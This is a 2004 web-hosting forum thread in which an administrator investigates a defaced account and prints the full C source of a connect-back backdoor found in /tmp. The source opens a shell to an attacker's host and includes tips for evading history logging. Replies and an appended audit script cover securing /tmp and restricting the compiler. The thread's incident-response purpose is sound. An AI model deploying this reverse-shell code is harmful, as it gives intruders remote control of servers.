The Community Forums


One account hacked through /tmp

Discussion in 'General Discussion' started by elleryjh, Jan 31, 2004.

  1. elleryjh

    elleryjh Well-Known Member

    Joined:
    Apr 12, 2003
    Messages:
    479
    Likes Received:
    0
    Trophy Points:
    16
    One account on a new, up-to-date server was hacked. The account doesn't have shell access. The site's index page was changed, with no other visible changes. The user is not likely to have done the exploit.

    phpsuexec, suexec and php_basedir are all enabled.

    No FTP activity for that account was listed in /var/log/messages.

    No processes are running as that user.

    Does anybody know how this attack was carried out, and where to look for more evidence?

    /tmp is mounted as noexec, and
    root@server [/tmp]# /scripts/securetmp
    /tmp is already secure
    /var/tmp is already secure
    Process Complete

    However, it looks like this file was compiled and run... This file and its binary were in /tmp, owned by that user:
    root@server [/tmp]# more dc-connectback.c
    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    int main(int argc, char **argv) {
        char *host;
        int port = 80;
        int f;
        int l;
        int sock;
        struct in_addr ia;
        struct sockaddr_in sin, from;
        struct hostent *he;
        char msg[] = "Welcome to Data Cha0s Connect Back Shell\n\n"
                     "Issue \"export TERM=xterm; exec bash -i\"\n"
                     "For More Reliable Shell.\n"
                     "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
                     "For Not Getting Logged.\n(;\n\n";

        printf("Data Cha0s Connect Back Backdoor\n\n");
        if (argc < 2 || argc > 3) {
            printf("Usage: %s [Host] <port>\n", argv[0]);
            return 1;
        }

        printf("[*] Dumping Arguments\n");
        l = strlen(argv[1]);
        if (l <= 0) {
            printf("[-] Invalid Host Name\n");
            return 1;
        }
        if (!(host = (char *) malloc(l))) {
            printf("[-] Unable to Allocate Memory\n");
            return 1;
        }
        strncpy(host, argv[1], l);
        if (argc == 3) {
            port = atoi(argv[2]);
            if (port <= 0 || port > 65535) {
                printf("[-] Invalid Port Number\n");
                return 1;
            }
        }

        printf("[*] Resolving Host Name\n");
        he = gethostbyname(host);
        if (he) {
            memcpy(&ia.s_addr, he->h_addr, 4);
        } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
            printf("[-] Unable to Resolve: %s\n", host);
            return 1;
        }

        sin.sin_family = PF_INET;
        sin.sin_addr.s_addr = ia.s_addr;
        sin.sin_port = htons(port);

        printf("[*] Connecting...\n");
        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            printf("[-] Socket Error\n");
            return 1;
        }
        if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
            printf("[-] Unable to Connect\n");
            return 1;
        }

        printf("[*] Spawning Shell\n");
        f = fork();
        if (f < 0) {
            printf("[-] Unable to Fork\n");
            return 1;
        } else if (!f) {
            write(sock, msg, sizeof(msg));
            dup2(sock, 0);
            dup2(sock, 1);
            dup2(sock, 2);
            execl("/bin/sh", "shell", NULL);
            close(sock);
            return 0;
        }
        printf("[*] Detached\n\n");
        return 0;
    }
     
  2. Stenny Chong

    Stenny Chong Well-Known Member

    Joined:
    Jun 12, 2002
    Messages:
    67
    Likes Received:
    0
    Trophy Points:
    6
    I suggest you do the following to secure the server and disallow other users from compiling programs:

    chmod 700 /usr/bin/gcc
     
  3. kris1351

    kris1351 Well-Known Member

    Joined:
    Apr 18, 2003
    Messages:
    963
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lewisville, Tx
    Definitely need to run /scripts/securetmp

    This will make it so no compiling or execution can happen in /tmp. Like Stenny said, also make gcc non-executable. You can change it back very easily when you need to compile.
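As an added example (not from this thread and not cPanel's own /scripts/securetmp), here is a small POSIX shell audit of what the replies above rely on, relevant both to the original post's question of where to look for evidence and to the securetmp/gcc advice: it checks that /tmp and /var/tmp are separate mounts carrying noexec and nosuid, lists files in a temp directory that start with the ELF magic (a compiled binary is found that way whatever it is named and whether or not +x is set), and checks whether the compiler is executable by "other" users. The two mount listings and the /usr/tmpDSK device name are constructed samples; run it with --live to read the real /proc/mounts and scan the real temp directories.

```shell
#!/bin/sh
# Added example, not from the thread or from cPanel's /scripts/securetmp.
# Checks the three things the replies rely on: temp directories are separate
# noexec,nosuid mounts, nothing compiled (ELF) is sitting in them, and the
# compiler is not executable by other users. Mount listings are constructed.

# Constructed sample: /proc/mounts after securetmp (tmpDSK name is assumed).
SECURE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/usr/tmpDSK /tmp ext3 rw,noexec,nosuid 0 0
/usr/tmpDSK /var/tmp ext3 rw,noexec,nosuid 0 0'

# Constructed sample: /tmp is just a directory on /, /var/tmp has no entry.
INSECURE_MOUNTS='/dev/sda1 / ext3 rw 0 0
tmpfs /dev/shm tmpfs rw 0 0'

# Print the option field for mount point $1 from a /proc/mounts-style
# listing on stdin; exit 1 when the path is not a mount point at all.
mount_opts() {
    awk -v mp="$1" '$2 == mp { print $4; found = 1 } END { exit (found ? 0 : 1) }'
}

# Exit 0 if the comma-separated option list $1 contains option $2.
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
        *)        return 1 ;;
    esac
}

# Exit 0 only when /tmp and /var/tmp are both mounted noexec,nosuid;
# print one line per problem so the output can go straight into a ticket.
audit_tmp() {
    listing=$(cat)
    rc=0
    for mp in /tmp /var/tmp; do
        if opts=$(printf '%s\n' "$listing" | mount_opts "$mp"); then
            for want in noexec nosuid; do
                if ! has_opt "$opts" "$want"; then
                    echo "$mp: missing $want (mounted $opts)"
                    rc=1
                fi
            done
        else
            echo "$mp: not a separate mount, inherits the options of /"
            rc=1
        fi
    done
    return $rc
}

# List files under $1 whose first four bytes are the ELF magic 7f 45 4c 46.
find_elf() {
    find "$1" -type f 2>/dev/null | while read -r f; do
        magic=$(dd if="$f" bs=4 count=1 2>/dev/null | od -An -tx1 | tr -d ' \n')
        if [ "$magic" = "7f454c46" ]; then
            echo "$f"
        fi
    done
}

# Exit 0 if "other" users have execute permission on $1 (the tenth column
# of ls -l is the other-execute bit: x, or t when the sticky bit is set).
others_can_exec() {
    case "$(ls -ld "$1" | cut -c10)" in
        x|t) return 0 ;;
        *)   return 1 ;;
    esac
}

# Stand-alone use on a real server: sh audit_tmp.sh --live
if [ "${1:-}" = "--live" ]; then
    audit_tmp < /proc/mounts && echo "temp mounts: ok"
    echo "compiled files in /tmp and /var/tmp:"
    find_elf /tmp
    find_elf /var/tmp
    others_can_exec /usr/bin/gcc && echo "/usr/bin/gcc is executable by all users"
fi
```

Two points worth keeping in mind when reading the output. noexec only stops the kernel from executing files directly from that mount; it does not stop gcc (which lives outside /tmp) from writing its output there, which is why the thread pairs securetmp with restricting gcc. Conversely, restricting gcc does nothing against a binary that was built elsewhere and uploaded, which is what the ELF scan is for.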
     